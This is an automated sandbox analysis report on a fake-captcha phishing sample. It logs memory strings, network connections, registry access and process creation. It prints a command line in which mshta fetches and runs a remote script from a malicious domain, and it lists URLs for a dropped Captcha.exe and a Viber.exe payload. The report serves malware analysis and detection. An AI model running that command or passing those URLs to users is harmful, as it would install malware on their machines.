Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: Captcha.exe.15.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000F.00000002.1588798652.00000000058C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://rea.grupolalegion.ec
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000F.00000002.1588798652.0000000005006000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.00000000058E4000.00000004.00000800.00020000.00000000.sdmp, Captcha.exe.15.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1587781228.0000000000E52000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: mshta.exe, 0000000D.00000003.1525620928.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1523553043.0000000000B44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527169207.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com
Source: powershell.exe, 0000000F.00000002.1596466284.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegioH
Source: powershell.exe, 0000000F.00000002.1588798652.0000000004F16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.000000000559A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec
Source: mshta.exe, 0000000D.00000003.1523553043.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525173070.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527261841.0000000000B57000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/
Source: powershell.exe, 0000000F.00000002.1587781228.0000000000E74000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1588798652.0000000004DC1000.00000004.00000800.00020000.00000000.sdmp, p[1].htm.13.dr	String found in binary or memory: https://rea.grupolalegion.ec/Viber.exe
Source: mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.php
Source: mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.php%FVV
Source: mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.php...
Source: mshta.exe, 0000000D.00000003.1525173070.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1526519185.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527315608.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.php...o
Source: mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.php8
Source: mshta.exe, 0000000D.00000002.1526996208.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527109411.0000000000AD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1523461893.0000000000B8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpC:
Source: mshta.exe, 0000000D.00000002.1527169207.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525620928.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpEventt
Source: mshta.exe, 0000000D.00000002.1527432754.0000000002F70000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpSSO
Source: mshta.exe, 0000000D.00000003.1525620928.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000002.1527169207.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpcrosoft
Source: mshta.exe, 0000000D.00000002.1527169207.0000000000B02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000D.00000003.1525620928.0000000000B02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpd
Source: mshta.exe, 0000000D.00000003.1526009844.00000000062E5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phphttps://rea.grupolalegion.ec/p.php
Source: mshta.exe, 0000000D.00000002.1527109411.0000000000AE2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/p.phpiF

Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49677 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.7:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.7:49725 version: TLS 1.2

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\Captcha.exe

Jump to dropped file

Source: C:\ProgramData\Captcha.exe

Process Stats: CPU usage > 49%

Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FA7F50 DuplicateHandle,GetCurrentThreadId,CreateWaitableTimerExW,CreateWaitableTimerExW,NtCreateWaitCompletionPacket,VirtualQuery,		17_2_00FA7F50
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FA6700 NtCancelWaitCompletionPacket,SetWaitableTimer,NtAssociateWaitCompletionPacket,		17_2_00FA6700

Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C8E910	17_3_01C8E910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C92910	17_3_01C92910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA2910	17_3_01CA2910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBC910	17_3_01CBC910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB0910	17_3_01CB0910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCA910	17_3_01CCA910
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCA110	17_3_01CCA110
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD8110	17_3_01CD8110
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCB934	17_3_01CCB934
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB5130	17_3_01CB5130
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC1130	17_3_01CC1130
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCF130	17_3_01CCF130
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA3934	17_3_01CA3934
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBD934	17_3_01CBD934
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB1934	17_3_01CB1934
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD70CB	17_3_01CD70CB
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB6840	17_3_01CB6840
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC2840	17_3_01CC2840
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD0840	17_3_01CD0840
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC4020	17_3_01CC4020
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD2020	17_3_01CD2020
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC5380	17_3_01CC5380
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD3380	17_3_01CD3380
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA3B92	17_3_01CA3B92
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB1B92	17_3_01CB1B92
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBDB92	17_3_01CBDB92
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCBB92	17_3_01CCBB92
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC5AD0	17_3_01CC5AD0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD3AD0	17_3_01CD3AD0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB6290	17_3_01CB6290
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC2290	17_3_01CC2290
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD0290	17_3_01CD0290
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C8F2B0	17_3_01C8F2B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C932B0	17_3_01C932B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA32B0	17_3_01CA32B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBD2B0	17_3_01CBD2B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB12B0	17_3_01CB12B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCB2B0	17_3_01CCB2B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA3A4A	17_3_01CA3A4A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB1A4A	17_3_01CB1A4A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBDA4A	17_3_01CBDA4A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCBA4A	17_3_01CCBA4A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA3A2A	17_3_01CA3A2A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB1A2A	17_3_01CB1A2A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBDA2A	17_3_01CBDA2A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCBA2A	17_3_01CCBA2A
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD65E0	17_3_01CD65E0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD950D	17_3_01CD950D
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC5FE0	17_3_01CC5FE0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD3FE0	17_3_01CD3FE0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC57A0	17_3_01CC57A0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD37A0	17_3_01CD37A0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C8DEF0	17_3_01C8DEF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01C91EF0	17_3_01C91EF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CAFEF0	17_3_01CAFEF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA1EF0	17_3_01CA1EF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBBEF0	17_3_01CBBEF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CDBEF0	17_3_01CDBEF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC4E10	17_3_01CC4E10
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD2E10	17_3_01CD2E10
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB7620	17_3_01CB7620
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB5E20	17_3_01CB5E20
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCFE20	17_3_01CCFE20
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC3620	17_3_01CC3620
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CC1E20	17_3_01CC1E20
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CD1620	17_3_01CD1620
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F730C0	17_2_00F730C0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F79030	17_2_00F79030
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FAF800	17_2_00FAF800
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F77170	17_2_00F77170
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F76950	17_2_00F76950
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F75146	17_2_00F75146
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F96AF0	17_2_00F96AF0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FC2B10	17_2_00FC2B10
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F83300	17_2_00F83300
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F77CC0	17_2_00F77CC0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F764B0	17_2_00F764B0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F80CB0	17_2_00F80CB0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FAB460	17_2_00FAB460
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F83DD0	17_2_00F83DD0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F78580	17_2_00F78580
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F7ED40	17_2_00F7ED40
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FA1680	17_2_00FA1680
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FDBE50	17_2_00FDBE50
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F79630	17_2_00F79630
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F7EE25	17_2_00F7EE25
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F8AFA0	17_2_00F8AFA0
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00F85F10	17_2_00F85F10
Source: C:\ProgramData\Captcha.exe	Code function: 17_2_00FA2F00	17_2_00FA2F00
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CBD9B1	17_3_01CBD9B1
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CB19B1	17_3_01CB19B1
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CA39B1	17_3_01CA39B1
Source: C:\ProgramData\Captcha.exe	Code function: 17_3_01CCB9B1	17_3_01CCB9B1

Source: C:\ProgramData\Captcha.exe	Code function: String function: 00FAC860 appears 376 times
Source: C:\ProgramData\Captcha.exe	Code function: String function: 00FDB620 appears 287 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: classification engine

Classification label: mal100.phis.troj.evad.win@24/10@10/4

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\p[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2756:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qhk1cmkw.sfk.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Captcha.exe	String found in binary or memory: misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: Captcha.exe	String found in binary or memory: misrounded allocation in sysAllocruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:sec
Source: Captcha.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: Captcha.exe	String found in binary or memory: runtime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:sec
Source: Captcha.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: Captcha.exe	String found in binary or memory: /cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power
Source: Captcha.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: Captcha.exe	String found in binary or memory: /cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.ins
Source: Captcha.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: Captcha.exe	String found in binary or memory: /gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus old
Source: Captcha.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: Captcha.exe	String found in binary or memory: /memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent loc
Source: Captcha.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: Captcha.exe	String found in binary or memory: /memory/classes/heap/unused:bytes/sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspin
Source: Captcha.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: Captcha.exe	String found in binary or memory: /sched/pauses/stopping/gc:seconds/sched/pauses/total/other:secondsmin must be a non-zero power of 2runtime: failed mSpanList.insert runtime: castogscanstatus oldval=stoplockedm: inconsistent lockingfindrunnable: negative nmspinningfreeing stack not in a stack
Source: Captcha.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: Captcha.exe	String found in binary or memory: /memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime:
Source: Captcha.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
Source: Captcha.exe	String found in binary or memory: /sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime:
Source: Captcha.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: Captcha.exe	String found in binary or memory: lfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime:
Source: Captcha.exe	String found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: Captcha.exe	String found in binary or memory: ) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime:
Source: Captcha.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
Source: Captcha.exe	String found in binary or memory: runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable t
Source: Captcha.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:
Source: Captcha.exe	String found in binary or memory: uncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescUnable to determine system directoryruntime:

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2296 --field-trial-handle=2252,i,18259865782207701125,4781670294957568771,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://rea.grupolalegion.ec/p.php/1"
Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta https://rea.grupolalegion.ec/p.php
